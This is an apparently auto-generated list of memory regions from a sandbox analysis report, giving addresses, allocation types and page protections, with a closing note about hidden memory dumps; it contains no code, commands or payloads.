trusted library allocation
|
page execute and read and write
|
||
41480000
|
trusted library allocation
|
page read and write
|
||
29E1A681000
|
trusted library allocation
|
page read and write
|
||
3DC10000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
29EB0000
|
trusted library allocation
|
page read and write
|
||
41441000
|
trusted library allocation
|
page read and write
|
||
1A2C48C5000
|
trusted library allocation
|
page read and write
|
||
2407A000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C9C04000
|
heap
|
page read and write
|
||
A5F000
|
stack
|
page read and write
|
||
2A000000
|
trusted library allocation
|
page read and write
|
||
1A2C98D0000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
2405C000
|
heap
|
page read and write
|
||
41490000
|
trusted library allocation
|
page read and write
|
||
3BD9D000
|
heap
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
25B00000
|
trusted library allocation
|
page read and write
|
||
41570000
|
trusted library allocation
|
page read and write
|
||
28500000
|
trusted library allocation
|
page read and write
|
||
29EC0000
|
trusted library allocation
|
page read and write
|
||
2A020000
|
trusted library allocation
|
page read and write
|
||
21C337A0000
|
heap
|
page read and write
|
||
7FFAABAC0000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
41297000
|
heap
|
page read and write
|
||
1A2C9971000
|
trusted library allocation
|
page read and write
|
||
7EFE0000
|
direct allocation
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
29440000
|
trusted library allocation
|
page read and write
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
291EE000
|
stack
|
page read and write
|
||
4106F000
|
stack
|
page read and write
|
||
29FE0000
|
trusted library allocation
|
page read and write
|
||
29B2E000
|
stack
|
page read and write
|
||
296B0000
|
trusted library allocation
|
page read and write
|
||
3BDB9000
|
heap
|
page read and write
|
||
1A2C4749000
|
heap
|
page read and write
|
||
25FF9000
|
trusted library allocation
|
page read and write
|
||
414D0000
|
trusted library allocation
|
page read and write
|
||
7FFAABAA0000
|
trusted library allocation
|
page read and write
|
||
1A2C4717000
|
heap
|
page read and write
|
||
240A0000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
41283000
|
heap
|
page read and write
|
||
41490000
|
trusted library allocation
|
page read and write
|
||
670000
|
heap
|
page read and write
|
||
3BD20000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
41470000
|
trusted library allocation
|
page read and write
|
||
2945A000
|
heap
|
page read and write
|
||
292EF000
|
stack
|
page read and write
|
||
297F0000
|
trusted library allocation
|
page read and write
|
||
296B0000
|
trusted library allocation
|
page read and write
|
||
41DB0000
|
trusted library allocation
|
page read and write
|
||
1A2C4391000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
41470000
|
trusted library allocation
|
page read and write
|
||
7126E4F000
|
stack
|
page read and write
|
||
3DBC0000
|
heap
|
page read and write
|
||
6EC56000
|
unkown
|
page readonly
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
3FEDE000
|
stack
|
page read and write
|
||
19AC1860000
|
trusted library allocation
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
40B50000
|
trusted library allocation
|
page read and write
|
||
29E1C941000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
28CF0000
|
trusted library allocation
|
page read and write
|
||
25FBF000
|
trusted library allocation
|
page read and write
|
||
1A2C42F1000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
19AC1777000
|
heap
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
3D8B5000
|
trusted library allocation
|
page execute and read and write
|
||
28CD0000
|
trusted library allocation
|
page read and write
|
||
296C1000
|
trusted library allocation
|
page read and write
|
||
750000
|
heap
|
page read and write
|
||
23FDD000
|
heap
|
page read and write
|
||
1A2C42A0000
|
heap
|
page read and write
|
||
731000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
7FD30000
|
direct allocation
|
page read and write
|
||
40B90000
|
trusted library allocation
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
41450000
|
trusted library allocation
|
page execute and read and write
|
||
28CE0000
|
trusted library allocation
|
page read and write
|
||
3BDAC000
|
heap
|
page read and write
|
||
1A2C4352000
|
heap
|
page read and write
|
||
1A2C4377000
|
heap
|
page read and write
|
||
2B07C1A0000
|
heap
|
page execute and read and write
|
||
40A50000
|
heap
|
page read and write
|
||
40D000
|
unkown
|
page write copy
|
||
803000
|
heap
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
459000
|
unkown
|
page read and write
|
||
19AC1680000
|
heap
|
page read and write
|
||
1A2C9970000
|
trusted library allocation
|
page read and write
|
||
3BD70000
|
heap
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
25B1D000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C435E000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
296B0000
|
trusted library allocation
|
page read and write
|
||
1A2C4140000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
21C38CB0000
|
trusted library allocation
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
7FFAABAF0000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
40C00000
|
trusted library allocation
|
page read and write
|
||
25ED000
|
direct allocation
|
page read and write
|
||
1A2C4175000
|
heap
|
page read and write
|
||
1A2C46D9000
|
heap
|
page read and write
|
||
29C7000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
4025E000
|
stack
|
page read and write
|
||
13C73000
|
direct allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
1A2C439E000
|
heap
|
page read and write
|
||
29E1A55B000
|
trusted library allocation
|
page read and write
|
||
603000
|
heap
|
page read and write
|
||
7EBB0000
|
direct allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
29E19D18000
|
heap
|
page read and write
|
||
40B80000
|
trusted library allocation
|
page read and write
|
||
2410000
|
direct allocation
|
page read and write
|
||
7DE000
|
heap
|
page read and write
|
||
21C33890000
|
heap
|
page read and write
|
||
41470000
|
trusted library allocation
|
page read and write
|
||
C2F31FE000
|
stack
|
page read and write
|
||
198000
|
stack
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
7FFAABBA0000
|
trusted library allocation
|
page read and write
|
||
25FC000
|
direct allocation
|
page read and write
|
||
D936DFE000
|
stack
|
page read and write
|
||
2B07A3E4000
|
heap
|
page read and write
|
||
3D88D000
|
trusted library allocation
|
page execute and read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
3BE14000
|
heap
|
page read and write
|
||
1A2C49A0000
|
trusted library allocation
|
page read and write
|
||
6EC5D000
|
unkown
|
page read and write
|
||
40C30000
|
trusted library allocation
|
page read and write
|
||
7FFAABA01000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
4189E000
|
stack
|
page read and write
|
||
1A2C4960000
|
trusted library allocation
|
page read and write
|
||
3D88E000
|
stack
|
page read and write
|
||
13DDE000
|
stack
|
page read and write
|
||
19AC174B000
|
heap
|
page read and write
|
||
40BC0000
|
trusted library allocation
|
page read and write
|
||
296F0000
|
trusted library allocation
|
page read and write
|
||
1A2C48C9000
|
trusted library allocation
|
page read and write
|
||
314C2FE000
|
stack
|
page read and write
|
||
3BE4D000
|
heap
|
page read and write
|
||
40A80000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
3BE34000
|
heap
|
page read and write
|
||
40AB0000
|
trusted library allocation
|
page read and write
|
||
727000
|
heap
|
page read and write
|
||
28D60000
|
trusted library allocation
|
page read and write
|
||
C2F438E000
|
stack
|
page read and write
|
||
25F6F000
|
stack
|
page read and write
|
||
41D80000
|
trusted library allocation
|
page read and write
|
||
41550000
|
trusted library allocation
|
page read and write
|
||
7FFAAB86B000
|
trusted library allocation
|
page read and write
|
||
1A2C34C9000
|
heap
|
page read and write
|
||
7FFAABC50000
|
trusted library allocation
|
page read and write
|
||
41D90000
|
trusted library allocation
|
page read and write
|
||
41A30000
|
remote allocation
|
page read and write
|
||
41480000
|
trusted library allocation
|
page read and write
|
||
2B07A2B0000
|
trusted library allocation
|
page read and write
|
||
40A50000
|
trusted library allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
41283000
|
heap
|
page read and write
|
||
29C6E000
|
stack
|
page read and write
|
||
40BC0000
|
trusted library allocation
|
page read and write
|
||
314AF7E000
|
unkown
|
page readonly
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
29E1C24C000
|
trusted library allocation
|
page read and write
|
||
19AC1716000
|
heap
|
page read and write
|
||
40A40000
|
trusted library allocation
|
page read and write
|
||
13EDF000
|
stack
|
page read and write
|
||
41D80000
|
trusted library allocation
|
page read and write
|
||
1A2C418F000
|
heap
|
page read and write
|
||
21C338BD000
|
heap
|
page read and write
|
||
1A2C437B000
|
heap
|
page read and write
|
||
7E9E0000
|
direct allocation
|
page read and write
|
||
25AF0000
|
trusted library allocation
|
page read and write
|
||
1A2C4392000
|
heap
|
page read and write
|
||
7FFAAB9F0000
|
trusted library allocation
|
page execute and read and write
|
||
2230000
|
heap
|
page read and write
|
||
1A2C438D000
|
heap
|
page read and write
|
||
296D0000
|
trusted library allocation
|
page read and write
|
||
296B9000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
13C64000
|
direct allocation
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
7FFAABBF0000
|
trusted library allocation
|
page read and write
|
||
1A2C48E0000
|
trusted library allocation
|
page read and write
|
||
314A77E000
|
unkown
|
page readonly
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
2BA0000
|
heap
|
page read and write
|
||
2618000
|
direct allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
7FFB05F52000
|
unkown
|
page readonly
|
||
3BD40000
|
heap
|
page read and write
|
||
3D8BB000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAB83D000
|
trusted library allocation
|
page execute and read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
414A0000
|
trusted library allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
414C0000
|
trusted library allocation
|
page read and write
|
||
286C000
|
direct allocation
|
page read and write
|
||
7FFAABA12000
|
trusted library allocation
|
page read and write
|
||
1A2C4356000
|
heap
|
page read and write
|
||
28E80000
|
trusted library allocation
|
page read and write
|
||
40AF0000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
29EA0000
|
trusted library allocation
|
page read and write
|
||
1A2C435E000
|
heap
|
page read and write
|
||
2B07A290000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
41302000
|
heap
|
page read and write
|
||
3BE21000
|
heap
|
page read and write
|
||
19AC16F7000
|
heap
|
page read and write
|
||
7FFAABB60000
|
trusted library allocation
|
page read and write
|
||
1A2C4720000
|
heap
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
1A2C41BA000
|
heap
|
page read and write
|
||
2419000
|
direct allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
21C39020000
|
remote allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
1405E000
|
stack
|
page read and write
|
||
29E326A0000
|
heap
|
page read and write
|
||
3D910000
|
trusted library allocation
|
page read and write
|
||
7FFAABA60000
|
trusted library allocation
|
page read and write
|
||
1471E000
|
stack
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
1A2C432C000
|
heap
|
page read and write
|
||
1A2C4356000
|
heap
|
page read and write
|
||
242BF000
|
stack
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
40300000
|
heap
|
page execute and read and write
|
||
4159E000
|
stack
|
page read and write
|
||
29FE0000
|
trusted library allocation
|
page read and write
|
||
3D950000
|
trusted library allocation
|
page read and write
|
||
40E2E000
|
stack
|
page read and write
|
||
2B00022A000
|
trusted library allocation
|
page read and write
|
||
23FDA000
|
heap
|
page read and write
|
||
540000
|
unkown
|
page execute and read and write
|
||
3DDD0000
|
heap
|
page execute and read and write
|
||
40BA0000
|
trusted library allocation
|
page read and write
|
||
410AE000
|
stack
|
page read and write
|
||
1A2C3638000
|
trusted library allocation
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
41450000
|
trusted library allocation
|
page read and write
|
||
1444E000
|
stack
|
page read and write
|
||
7FCB0000
|
direct allocation
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
41DA0000
|
trusted library allocation
|
page read and write
|
||
29E2A34F000
|
trusted library allocation
|
page read and write
|
||
40B70000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
1A2C9979000
|
trusted library allocation
|
page read and write
|
||
1A2C439E000
|
heap
|
page read and write
|
||
1A2C46E2000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
25FE7000
|
trusted library allocation
|
page read and write
|
||
1A2C4368000
|
heap
|
page read and write
|
||
29E32390000
|
heap
|
page read and write
|
||
1A2C34C6000
|
heap
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
19AC1724000
|
heap
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
25E6000
|
direct allocation
|
page read and write
|
||
3DBB0000
|
heap
|
page read and write
|
||
3BD7C000
|
heap
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
1454F000
|
stack
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
29E323DE000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
4147F000
|
trusted library allocation
|
page read and write
|
||
29B4000
|
heap
|
page read and write
|
||
29E19C54000
|
heap
|
page read and write
|
||
2B07A0AA000
|
heap
|
page read and write
|
||
D936BFD000
|
stack
|
page read and write
|
||
577000
|
unkown
|
page readonly
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
41470000
|
trusted library allocation
|
page read and write
|
||
40C10000
|
trusted library allocation
|
page read and write
|
||
13D5A000
|
stack
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
7FC40000
|
direct allocation
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
1A2C418F000
|
heap
|
page read and write
|
||
1A2C4333000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
7FFAAB950000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C9974000
|
trusted library allocation
|
page read and write
|
||
29E1A54A000
|
trusted library allocation
|
page read and write
|
||
71E000
|
stack
|
page read and write
|
||
41450000
|
trusted library allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
41DB0000
|
trusted library allocation
|
page read and write
|
||
411FE000
|
stack
|
page read and write
|
||
142BF000
|
stack
|
page read and write
|
||
260A000
|
direct allocation
|
page read and write
|
||
71267FE000
|
stack
|
page read and write
|
||
7F0C0000
|
direct allocation
|
page read and write
|
||
3BECD000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C41BB000
|
heap
|
page read and write
|
||
3D8E0000
|
trusted library allocation
|
page read and write
|
||
296F0000
|
trusted library allocation
|
page read and write
|
||
41470000
|
trusted library allocation
|
page read and write
|
||
21C336A0000
|
heap
|
page read and write
|
||
28EB0000
|
trusted library allocation
|
page read and write
|
||
41C40000
|
trusted library allocation
|
page read and write
|
||
1A2C438D000
|
heap
|
page read and write
|
||
7FFAABB20000
|
trusted library allocation
|
page read and write
|
||
2468000
|
direct allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
19AC1778000
|
heap
|
page read and write
|
||
7FFAABA70000
|
trusted library allocation
|
page read and write
|
||
29E1BF69000
|
trusted library allocation
|
page read and write
|
||
1A2C4377000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
2852E000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C3694000
|
trusted library allocation
|
page read and write
|
||
25B20000
|
heap
|
page read and write
|
||
630000
|
heap
|
page read and write
|
||
2633000
|
heap
|
page read and write
|
||
41B7F000
|
stack
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
7FFAABAA0000
|
trusted library allocation
|
page read and write
|
||
3BDDD000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41441000
|
trusted library allocation
|
page read and write
|
||
4024E000
|
stack
|
page read and write
|
||
3D8B2000
|
trusted library allocation
|
page read and write
|
||
296FF000
|
trusted library allocation
|
page read and write
|
||
727000
|
heap
|
page read and write
|
||
1A2C438D000
|
heap
|
page read and write
|
||
41A30000
|
remote allocation
|
page read and write
|
||
419AF000
|
stack
|
page read and write
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
45DE000
|
stack
|
page read and write
|
||
8DF000
|
stack
|
page read and write
|
||
40BF0000
|
trusted library allocation
|
page read and write
|
||
25B03000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
41322000
|
heap
|
page read and write
|
||
4125B000
|
heap
|
page read and write
|
||
41470000
|
trusted library allocation
|
page read and write
|
||
21C38E41000
|
heap
|
page read and write
|
||
3D8D0000
|
trusted library allocation
|
page read and write
|
||
2603000
|
direct allocation
|
page read and write
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
29CB0000
|
trusted library allocation
|
page execute and read and write
|
||
40F6E000
|
stack
|
page read and write
|
||
24070000
|
heap
|
page read and write
|
||
1A2C9C00000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
21C38EC7000
|
heap
|
page read and write
|
||
148A8000
|
heap
|
page read and write
|
||
41400000
|
trusted library allocation
|
page read and write
|
||
1A2C46E5000
|
heap
|
page read and write
|
||
7FFAAB830000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
7FFAABB70000
|
trusted library allocation
|
page read and write
|
||
1A2C41A0000
|
heap
|
page read and write
|
||
29E1BE03000
|
trusted library allocation
|
page read and write
|
||
2B0011BC000
|
trusted library allocation
|
page read and write
|
||
1A2C98C2000
|
trusted library allocation
|
page read and write
|
||
3BD70000
|
heap
|
page read and write
|
||
411C0000
|
trusted library allocation
|
page read and write
|
||
1A2C46D1000
|
heap
|
page read and write
|
||
21C33895000
|
heap
|
page read and write
|
||
5DB000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
3DDA0000
|
trusted library allocation
|
page read and write
|
||
3BE60000
|
heap
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
21C38E58000
|
heap
|
page read and write
|
||
40F6E000
|
stack
|
page read and write
|
||
40B20000
|
trusted library allocation
|
page read and write
|
||
28E85000
|
trusted library allocation
|
page read and write
|
||
411C0000
|
trusted library allocation
|
page read and write
|
||
7FFAAB9D0000
|
trusted library allocation
|
page read and write
|
||
411C0000
|
heap
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
21A8000
|
direct allocation
|
page read and write
|
||
21C38E8F000
|
heap
|
page read and write
|
||
285B000
|
direct allocation
|
page read and write
|
||
7FDF0000
|
trusted library allocation
|
page execute and read and write
|
||
13BED000
|
direct allocation
|
page read and write
|
||
296E0000
|
trusted library allocation
|
page read and write
|
||
14B24000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
3D8B5000
|
trusted library allocation
|
page execute and read and write
|
||
540000
|
remote allocation
|
page execute and read and write
|
||
7126D4A000
|
stack
|
page read and write
|
||
21C38E2A000
|
heap
|
page read and write
|
||
78A000
|
heap
|
page read and write
|
||
2968D000
|
trusted library allocation
|
page read and write
|
||
41445000
|
trusted library allocation
|
page read and write
|
||
21B9000
|
direct allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
40972000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
296E0000
|
trusted library allocation
|
page read and write
|
||
296E0000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
7FFAABBE0000
|
trusted library allocation
|
page read and write
|
||
1A2C3631000
|
trusted library allocation
|
page read and write
|
||
28576000
|
trusted library allocation
|
page read and write
|
||
2B07A19A000
|
heap
|
page read and write
|
||
3D8A2000
|
trusted library allocation
|
page read and write
|
||
29E1CB78000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
29FF0000
|
trusted library allocation
|
page read and write
|
||
C2F420E000
|
stack
|
page read and write
|
||
7FFAAB860000
|
trusted library allocation
|
page read and write
|
||
1A2C41CC000
|
heap
|
page read and write
|
||
2412000
|
direct allocation
|
page read and write
|
||
402CB000
|
trusted library allocation
|
page read and write
|
||
29740000
|
trusted library allocation
|
page read and write
|
||
29A0000
|
heap
|
page read and write
|
||
7FFAABB90000
|
trusted library allocation
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
25B10000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
40B00000
|
trusted library allocation
|
page read and write
|
||
41A30000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
41DA0000
|
trusted library allocation
|
page read and write
|
||
C2F3073000
|
stack
|
page read and write
|
||
1A2C41CF000
|
heap
|
page read and write
|
||
1A2C4155000
|
heap
|
page read and write
|
||
1A2C3620000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
314AD7E000
|
unkown
|
page readonly
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
23FD0000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
296F0000
|
trusted library allocation
|
page read and write
|
||
1A2C4346000
|
heap
|
page read and write
|
||
41C30000
|
trusted library allocation
|
page read and write
|
||
297F000
|
stack
|
page read and write
|
||
28EC0000
|
trusted library allocation
|
page read and write
|
||
7FFAAB85D000
|
trusted library allocation
|
page execute and read and write
|
||
426000
|
unkown
|
page execute and read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
8A0000
|
remote allocation
|
page execute and read and write
|
||
29CFE000
|
stack
|
page read and write
|
||
1481D000
|
stack
|
page read and write
|
||
29E19F70000
|
heap
|
page execute and read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
7FFAABC40000
|
trusted library allocation
|
page read and write
|
||
C2F35BA000
|
stack
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
56E000
|
unkown
|
page read and write
|
||
416000
|
unkown
|
page readonly
|
||
3D883000
|
trusted library allocation
|
page execute and read and write
|
||
3BE5A000
|
heap
|
page read and write
|
||
1A2C98D5000
|
trusted library allocation
|
page read and write
|
||
7EB40000
|
direct allocation
|
page read and write
|
||
1A2C4366000
|
heap
|
page read and write
|
||
296D0000
|
trusted library allocation
|
page read and write
|
||
1440E000
|
stack
|
page read and write
|
||
40B8C000
|
stack
|
page read and write
|
||
198000
|
stack
|
page read and write
|
||
28E30000
|
trusted library allocation
|
page read and write
|
||
41470000
|
trusted library allocation
|
page read and write
|
||
2B07A0A0000
|
heap
|
page read and write
|
||
296E0000
|
trusted library allocation
|
page read and write
|
||
40986000
|
trusted library allocation
|
page read and write
|
||
3D890000
|
trusted library allocation
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
4147F000
|
trusted library allocation
|
page read and write
|
||
4F0000
|
remote allocation
|
page execute and read and write
|
||
40BE0000
|
trusted library allocation
|
page read and write
|
||
1A2C34B9000
|
heap
|
page read and write
|
||
29EB0000
|
trusted library allocation
|
page read and write
|
||
40C40000
|
trusted library allocation
|
page read and write
|
||
2B07C119000
|
heap
|
page read and write
|
||
4124E000
|
heap
|
page read and write
|
||
2810E000
|
stack
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
19AC1757000
|
heap
|
page read and write
|
||
3DBF0000
|
heap
|
page execute and read and write
|
||
414B0000
|
trusted library allocation
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
2B07A2D0000
|
trusted library allocation
|
page read and write
|
||
21C38DE0000
|
trusted library allocation
|
page read and write
|
||
5F5000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
243D000
|
direct allocation
|
page read and write
|
||
40B90000
|
trusted library allocation
|
page read and write
|
||
41450000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
141BE000
|
stack
|
page read and write
|
||
3BE59000
|
heap
|
page read and write
|
||
2950A000
|
heap
|
page read and write
|
||
1A2C34CD000
|
heap
|
page read and write
|
||
3DBAC000
|
stack
|
page read and write
|
||
7FFAABAE0000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
40B60000
|
trusted library allocation
|
page read and write
|
||
3D893000
|
trusted library allocation
|
page read and write
|
||
19AC1850000
|
trusted library allocation
|
page read and write
|
||
25B90000
|
heap
|
page read and write
|
||
7AB000
|
heap
|
page read and write
|
||
1A2C4334000
|
heap
|
page read and write
|
There are 2629 hidden memdumps, click here to show them.